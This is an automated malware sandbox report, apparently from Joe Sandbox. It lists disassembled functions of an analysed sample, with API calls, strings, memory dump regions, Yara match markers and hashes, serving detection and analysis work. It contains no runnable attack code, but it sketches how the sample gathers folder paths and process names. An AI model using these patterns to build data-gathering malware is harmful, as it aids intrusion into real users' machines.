                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: invalid string position$string too long
                                    • API String ID: 2002836212-4289949731
                                    • Opcode ID: 29e45d8a2896767fde84da441dbc1bdf9f80925d96ff1f1f8884d214c616407f
                                    • Instruction ID: 3b02c7b4395cbb4a6f6a9abb16a4d69af1391834f0a3369efa7d92a4e5adb595
                                    • Opcode Fuzzy Hash: 29e45d8a2896767fde84da441dbc1bdf9f80925d96ff1f1f8884d214c616407f
                                    • Instruction Fuzzy Hash: B621EA723006508BD720DADCE840A6AF7D9DBA2761B15493FF142CB241DB71DC41C3A6
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000A8883
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 6bc5194553a29373ffa595a1e127f797e47c5eb92224b8f69890cb4d97c34961
                                    • Instruction ID: 4df70111ba0ff23b9bdeaee443a33ab80dba86e3e51b7c283d0458b33c3d49b5
                                    • Opcode Fuzzy Hash: 6bc5194553a29373ffa595a1e127f797e47c5eb92224b8f69890cb4d97c34961
                                    • Instruction Fuzzy Hash: 6C31BBB5E005199FCB08DF58C8916AEBBB6EB89350F18C269E915EF345DB30AD01CBD1
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5922
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5935
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_std::exception::exception
                                    • String ID: Sec-WebSocket-Version: 13$string too long
                                    • API String ID: 1928653953-3304177573
                                    • Opcode ID: 977cbc50c34db4290c03e3e0b13ebb93c7c147f831650efa1f483dfcff000fb6
                                    • Instruction ID: 90a18637552bbd596cc8523d870c8eb8cb8fb64abacdb547af5d60d766207244
                                    • Opcode Fuzzy Hash: 977cbc50c34db4290c03e3e0b13ebb93c7c147f831650efa1f483dfcff000fb6
                                    • Instruction Fuzzy Hash: 94112E35314B40CBC7218B2CAC00B1EB7E1EB96762F250A9EE4D18B695D771E881C7A5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,000CA430,000000FF), ref: 000C3D20
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C3D27
                                    • wsprintfA.USER32 ref: 000C3D37
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 08590fc592d72fd71e4c45854b02fd122b7b0fff0c11e430d8d3353dc0eecd6e
                                    • Instruction ID: f0d44fc17416012ba246a9ed7e6837685d453d883d3a4459724e9e5eee9ff864
                                    • Opcode Fuzzy Hash: 08590fc592d72fd71e4c45854b02fd122b7b0fff0c11e430d8d3353dc0eecd6e
                                    • Instruction Fuzzy Hash: 44018071A45714BFE7205B54FC4EF6ABB68FB45B62F104116FA059B2D0D7B41D00CAA1
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000A8737
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 00b153c666219428dd420beb64f45f14c4c5345a47acbc0cbc7f6cfa8eb1abe6
                                    • Instruction ID: 0960e18ce333ed7eb7dbe9c087835989c4d458e10b2d12b2b69edae4a129c19b
                                    • Opcode Fuzzy Hash: 00b153c666219428dd420beb64f45f14c4c5345a47acbc0cbc7f6cfa8eb1abe6
                                    • Instruction Fuzzy Hash: 41F0B437F080220F8354647D8D8449EA94757E639033AD735E91AEF359EC70EC8296D5
                                    APIs
                                      • Part of subcall function 000C781C: __mtinitlocknum.LIBCMT ref: 000C7832
                                      • Part of subcall function 000C781C: __amsg_exit.LIBCMT ref: 000C783E
                                    • ___addlocaleref.LIBCMT ref: 000C8756
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                    • String ID: KERNEL32.DLL$Xu$xt
                                    • API String ID: 3105635775-946273361
                                    • Opcode ID: 919b1144a2120cabb4a0b52f1234340a96c97bcfd578718a4707e359d50567eb
                                    • Instruction ID: 9ccb41e68e470cbdc8a7a68d1176dea81a4a5fad75e59743a6cb55505ea2d2b5
                                    • Opcode Fuzzy Hash: 919b1144a2120cabb4a0b52f1234340a96c97bcfd578718a4707e359d50567eb
                                    • Instruction Fuzzy Hash: C001C471448B00DAE720AF79D805F8EB7E0AF01314F208A0EE1DA676E1CFB4A645CF15
                                    APIs
                                    Strings
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 000C1FDF, 000C1FF5, 000C20B7
                                    Yara matches
                                    Similarity
                                    • API ID: strlen
                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 39653677-4138519520
                                    • Opcode ID: 113d8e170c48ff9398251314ba5c71b9e9c0498b1f127e25a79d54f03a3c80c0
                                    • Instruction ID: 579143819a56ef3714f5fe94af7ea1f6a57cfe5546050eac1d5f71bda6d6c0b5
                                    • Opcode Fuzzy Hash: 113d8e170c48ff9398251314ba5c71b9e9c0498b1f127e25a79d54f03a3c80c0
                                    • Instruction Fuzzy Hash: 4B213A395102898FD720EB35C444BDDF3A6DF80362FA4446BC8190BA93E336194ED7A6
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BEBB4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BEBE3
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BEBF1
                                    • lstrcat.KERNEL32(?,00E6DF60), ref: 000BEC0C
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: e3be8087108a5c04a6ba564fbebbc4e925074152fe5a7f7e31f3effa7502970f
                                    • Instruction ID: c3fa3e135e0bab9cb8e1c7d5b9a62637a3e0214389c712d7a4843ff1e6c6c172
                                    • Opcode Fuzzy Hash: e3be8087108a5c04a6ba564fbebbc4e925074152fe5a7f7e31f3effa7502970f
                                    • Instruction Fuzzy Hash: 19318671E11118EBCB65EBA8EC45BEE73B4AF59300F1004B9BA1697251DE309E848B91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,000CA3D0,000000FF), ref: 000C2B8F
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 000C2B96
                                    • GetLocalTime.KERNEL32(?,?,00000000,000CA3D0,000000FF), ref: 000C2BA2
                                    • wsprintfA.USER32 ref: 000C2BCE
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: df79ec24d105657d7c66f5c83fa6d29360afc5650913211e7f08f784f7fc27ca
                                    • Instruction ID: ef0f9ef30e24ae617a5246ab866cab413fec56c844e595b21966c7a0f152f421
                                    • Opcode Fuzzy Hash: df79ec24d105657d7c66f5c83fa6d29360afc5650913211e7f08f784f7fc27ca
                                    • Instruction Fuzzy Hash: 560140B2D05128ABCB149BC9ED49FBEB7BCFB4CB12F00011AF645A2280E7785940C7B1
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 000C4492
                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 000C44AD
                                    • CloseHandle.KERNEL32(00000000), ref: 000C44B4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C44E7
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                    • String ID:
                                    • API String ID: 4028989146-0
                                    • Opcode ID: ecdf5057600b09abb4e3c8e90798ec0cb66a7e9712c5324d8f5737bfb629f3ba
                                    • Instruction ID: b4d592d91794acfdd18a4a574b28a84ae8ff539a1b12a1df6abf8c0cf99f6dba
                                    • Opcode Fuzzy Hash: ecdf5057600b09abb4e3c8e90798ec0cb66a7e9712c5324d8f5737bfb629f3ba
                                    • Instruction Fuzzy Hash: B7F0C8B0D026252FE7209B74AC4DBEABBA8BB14705F1405A5FA85D6180DAB08CC48790
                                    APIs
                                    • __getptd.LIBCMT ref: 000C8FDD
                                      • Part of subcall function 000C87FF: __amsg_exit.LIBCMT ref: 000C880F
                                    • __getptd.LIBCMT ref: 000C8FF4
                                    • __amsg_exit.LIBCMT ref: 000C9002
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 000C9026
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: c82ef751fbee71c07f79bb7af4ac79aeaf5fab2a64fdf3276b3a1066b4b17aff
                                    • Instruction ID: 5bb208e1cae934015b8fb4f42d552ec49b387e1cb3196e467fe1f9f7ed7206b5
                                    • Opcode Fuzzy Hash: c82ef751fbee71c07f79bb7af4ac79aeaf5fab2a64fdf3276b3a1066b4b17aff
                                    • Instruction Fuzzy Hash: A4F096329497109BD761BB78580AF9D33E06F00711F34821DF6496A1D3DF645901DB69
                                    APIs
                                    • lstrlen.KERNEL32(------,000A5BEB), ref: 000C731B
                                    • lstrcpy.KERNEL32(00000000), ref: 000C733F
                                    • lstrcat.KERNEL32(?,------), ref: 000C7349
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcatlstrcpylstrlen
                                    • String ID: ------
                                    • API String ID: 3050337572-882505780
                                    • Opcode ID: 3d7c9ad844c2af4347daf191e6ee3cdb03d880f7a66120f2d2fdd11d00819c2a
                                    • Instruction ID: e31a1297cb9463145a9feba48acedc37a332c365d9f3410773a00264d44d9de9
                                    • Opcode Fuzzy Hash: 3d7c9ad844c2af4347daf191e6ee3cdb03d880f7a66120f2d2fdd11d00819c2a
                                    • Instruction Fuzzy Hash: 13F0AC749157429FDB659F75EC48A26BBF9AF45701318882DA89AC7614E730D8408B10
                                    APIs
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B3422
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B344B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B3471
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B3497
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: e95108b6797ef2bf955b71dcf3f79de798c68482d8ebcfb1169a7b6969c9cf45
                                    • Instruction ID: cf73b3dd5759f1e7dff99113794a91d0aebe10fa0138361311ad70b23f72a817
                                    • Opcode Fuzzy Hash: e95108b6797ef2bf955b71dcf3f79de798c68482d8ebcfb1169a7b6969c9cf45
                                    • Instruction Fuzzy Hash: DF120E70A012119FDB68CF19D558B65B7E4BF44718B29C0AEE809DB3A2D772ED82CF40
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7C94
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7CAF
                                      • Part of subcall function 000B7D40: std::_Xinvalid_argument.LIBCPMT ref: 000B7D58
                                      • Part of subcall function 000B7D40: std::_Xinvalid_argument.LIBCPMT ref: 000B7D76
                                      • Part of subcall function 000B7D40: std::_Xinvalid_argument.LIBCPMT ref: 000B7D91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: string too long
                                    • API String ID: 909987262-2556327735
                                    • Opcode ID: faebf0f7e4526146a4f45ded21c3bcc112625c46cca6aaf43f3d00b50da4bd42
                                    • Instruction ID: ffbb2587210ea4b639970630d05b835fe3526be46aec6a235d69b55c4bdd6f2f
                                    • Opcode Fuzzy Hash: faebf0f7e4526146a4f45ded21c3bcc112625c46cca6aaf43f3d00b50da4bd42
                                    • Instruction Fuzzy Hash: A231C8723086148BD7349E6CE8849EAFBF9EFD1760B20462EF549CB741D7719C4183A5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 000A6F74
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A6F7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID: @
                                    • API String ID: 1357844191-2766056989
                                    • Opcode ID: 34c7d479645e88dbf6ffd2d473b5c821068f613e8d53b3b601b321c358741919
                                    • Instruction ID: 5559bf980cf9503bf156e7cf6819a61dec6964fc46a5df552371a3771a6b333d
                                    • Opcode Fuzzy Hash: 34c7d479645e88dbf6ffd2d473b5c821068f613e8d53b3b601b321c358741919
                                    • Instruction Fuzzy Hash: 5C218EB1A006029FEB608BA0DC84BB673F8EB42705F484878F956CB684F776E985C750
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C244C
                                    • lstrlen.KERNEL32(00000000), ref: 000C24E9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C2570
                                    • lstrlen.KERNEL32(00000000), ref: 000C2577
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: f913e7f1eb4ac41fb81c5b71bc304c00b257df383054eaeb423b40d550cc278a
                                    • Instruction ID: 68b97b6bb0d1d390c0196bbd828ccfe32b728070aa48cf96be9542d39d1848fd
                                    • Opcode Fuzzy Hash: f913e7f1eb4ac41fb81c5b71bc304c00b257df383054eaeb423b40d550cc278a
                                    • Instruction Fuzzy Hash: 7681A0B1E013099BDB14DF98DC54FAEB7B5AF94300F18807DE908A7282EB759D46CB94
                                    APIs
                                      • Part of subcall function 000A1610: lstrcpy.KERNEL32(00000000), ref: 000A162D
                                      • Part of subcall function 000A1610: lstrcpy.KERNEL32(00000000,?), ref: 000A164F
                                      • Part of subcall function 000A1610: lstrcpy.KERNEL32(00000000,?), ref: 000A1671
                                      • Part of subcall function 000A1610: lstrcpy.KERNEL32(00000000,?), ref: 000A1693
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
